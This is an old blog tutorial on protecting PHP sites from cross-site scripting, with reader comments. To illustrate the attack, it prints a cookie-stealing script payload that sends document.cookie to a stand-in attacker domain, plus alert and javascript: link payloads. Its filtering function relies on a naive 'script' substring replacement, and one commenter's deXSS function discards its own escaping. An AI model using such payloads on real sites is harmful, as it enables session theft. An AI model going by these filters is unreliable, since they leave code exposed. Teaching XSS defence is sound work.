How To Protect Your Site From XSS With PHP
June 8th 2011Cross-Site Scripting (XSS) is a type of attack where a hacker attempts to inject client-side scripting into a webpage that others are able to view. The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged in user's credentials (commonly saved in browser cookies). With a user's credentials, a hacker could gain access to sensitive parts of your website or web application. In this simple guide, I'll show you a few ways to protect your website from XSS with PHP.
The Basics Of An XSS Attack with Example
If you allow user input on your site or application (like comments, forums, etc), you could be the target of an XSS attack. The hacker's goal is to submit a comment, forum post, etc with JavaScript code inside and have it executed on the web page. Since these types of user input can immediately be displayed to other user's, the attack could be spread pretty quickly and even without your knowledge. For an example, we'll use comments on my website:
Let's say some hacker comes along (his name is John) and submits a comment with <script>alert('XSS!');</script> in the body of the comment. When John refreshes the page, he sees an alert message pop up that says "XSS!". His attack worked!
All John does in this example is create an annoyance to users; he doesn't actually steal any information. However, since that attack went through so easily, John may be thinking of other things he could do like stealing cookies! In JavaScript, cookies are accessible from the document object (i.e. document.cookie). John could easily send any cookies, of users that visit the page his comment is posted on, to his website by posting the following in the body of the comment form:
<script>document.write("<img src='http://johns-site.com/?cookies='"+document.cookie+"' style='display:none;' />");</script>
Why does that work? When your browser visits a webpage, it downloads any images. If the SRC attribute of an image points to something like the above, your browser will execute it. If John receives cookies that are used to validate a user login, he could use those cookies to gain access to, perhaps, an administrative control panel and do even more damage! Also notice that he set the display property of that element to "none", this makes it so users can't see the image. John could post a valid comment about the article and execute that script without anyone knowing what he's doing! The rule of thumb here is to NEVER TRUST USER INPUT!
How To Filter Out XSS Using PHP
PHP has a couple different functions you can use to filter user input, namely: htmlentities() and strip_tags().
The htmlentities() function translates all applicable characters to their html entity counterparts. For example, using this function < would become < and > would become > (i.e. <script> would become <script>). This function is good for escaping data and might prevent some types of attack, but not all (thanks to IE6). When using the htmlentities function, make sure the second argument is set to ENT_QUOTES, like this:
htmlentities("<script>alert('XSS!');</script>", ENT_QUOTES);
You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities - a hacker doesn't need to use the <script> tag in hyperlinks to get JavaScript to execute). So what can you do? You can use PHP to search for "script" and replace it with scri<b></b>pt. Cutting up the code like this will prevent it from executing while still displaying the output.
The XSS_PROTECT Function
Let's create a PHP function that will filter out any data that may have XSS code inside of it:
/**
* Method: xss_protect
* Purpose: Attempts to filter out code used for cross-site scripting attacks
* @param $data - the string of data to filter
* @param $strip_tags - true to use PHP's strip_tags function for added security
* @param $allowed_tags - a list of tags that are allowed in the string of data
* @return a fully encoded, escaped and (optionally) stripped string of data
*/
function xss_protect($data, $strip_tags = false, $allowed_tags = "") {
if($strip_tags) {
$data = strip_tags($data, $allowed_tags . "<b>");
}
if(stripos($data, "script") !== false) {
$result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES));
} else {
$result = htmlentities($data, ENT_QUOTES);
}
return $result;
}
You can send this function any type of user input and it will return the same input, but fully escaped and encoded. This function first checks to see if the data contains the word "script" anywhere; if it doesn't, it just encodes/escapes the data and returns it. If, however, the stripos function finds "script" somewhere, it encodes/escapes the data and replaces all findings of "script" with scr<b></b>ipt and then returns the modified result.
There are a couple things to notice about this function; first, the stripos function is a way to check the existence of a substring within a string without regards to case (i.e. it will find "script", "sCrIpT" or "SCRIPT"); second, comparing the result of the stripos function to false with "!==", instead of "!=", is important since the stripos function can return a non-boolean value which evaluates to false (like 0 or ""). Using "!==" compares both the types and values while using "!=" compares just the values. See the PHP documentation on the stripos function for more information.
You can optionally specify whether you want the function to strip any HTML tags from the data string by setting the second parameter of the function to true. The third parameter can then be used to specify which HTML tags are allowed in the data string (which becomes the second argument to PHP's strip_tags function).
Here are a comple of examples on how to use this function:
//returns fully encoded/escaped content from comment
$data = xss_protect($_POST['comment_data']);
//outputs: <scr<b></b>ipt>alert('XSS!');</scr<b></b>ipt>
echo xss_protect("<script>alert('XSS!');</script>");
//outputs: click here
echo xss_protect("<a href="javascript:alert(document.cookie);">click here</a>", true);
Never Trust User Input
No solution is going to be perfect, but at least now you have a head start! If you have ways of improving this function, let myself and everyone else know in the comments. Thanks for reading!
Discussion
06/10/2011
I am confused a hyperlink is just another tag (<a href=""></a>) that is tripped by the strip_tags() function. I sort of see your point if you are allowing the "a" tag within the strip_tags() function but once I have reached the point where I allow the user to do any html input I would place more faith in an html sanitizer such as HTMLPurifier or something.
06/10/2011
I haven't used HTMLPurifier myself, but I've seen other people recommending it. It looks like a great library for making sure your code is XSS free. However, be aware that HTMLPurifier isn't exactly a fast running solution. Taken from their FAQs page:
"HTML Purifier isn't exactly light or speedy; this is a tradeoff for the power and security the library affords. You can combat this by reading Speeding up HTML Purifier or using the standalone version." http://htmlpurifier.org/docs
If I were the one implementing their solution, I'd be using their standalone version and speeding that up as much as I can. You definitely don't want your application hanging... Just make sure you know the ins and outs of any solution you end up using.
Thanks for pointing this out though, it definitely needed clearing up.
06/10/2011
http://www.php.net/manual/book.filter.php
06/13/2011
Don't reinvent the weel, try PHPIDS, it's really great XSS detection system. https://phpids.org/
06/13/2011
Obviously in some specific cases its necessary, but as a general validation function I don't think its right to include it.
For example, if I want to type "Underlined" and you strip my tags, it will just show as "Underlined" which is unexpected from a users POV. The correct output should be "<u>Underlined</u>"
Also, I believe in some browsers alert(1); may work. Same with line breaks.
I don't see why htmlentities with ENT_QUOTES isn't enough?
This is a function I use on one of my sites to show text as the user typed it (including line-breaks).
function display_html($string, $nl2br=true) {
$string = htmlentities($string, ENT_QUOTES, "utf-8"); // Convert normal chars
if ($nl2br) {
$string = nl2br($string);
}
$string = stripslashes($string);
return $string;
}
If I wanted to all tags, I think the best method would be to create a new function to convert patterns back to html.
06/13/2011
My first example and first quote was wrapped in html "u" tags. That's the point I was trying to make.
06/13/2011
If you want to allow users to be able to enter HTML markup, the only route you can go is with HTMLPurifier http://htmlpurifier.org/(or a similar library) which attempts to turn the user input into standards compliant HTML before stripping out the bad. It gets pretty much every vector listed in the list above, but a large performance cost.
Thanks for drawing attention to this important topic!
06/14/2011
I've just felt safe with some functions like strip_tags or htmlentities. but due to your tips I'll think about it again.
10/04/2011
04/09/2012
06/18/2012
09/21/2012
12/02/2012
You may include such punction into main file to control all POST requests.
12/02/2012
function deXSS() {
foreach ($_POST as $v)
{
htmlspecialchars($v);
}
return true;
}
deXSS();
02/19/2013
Have something to say?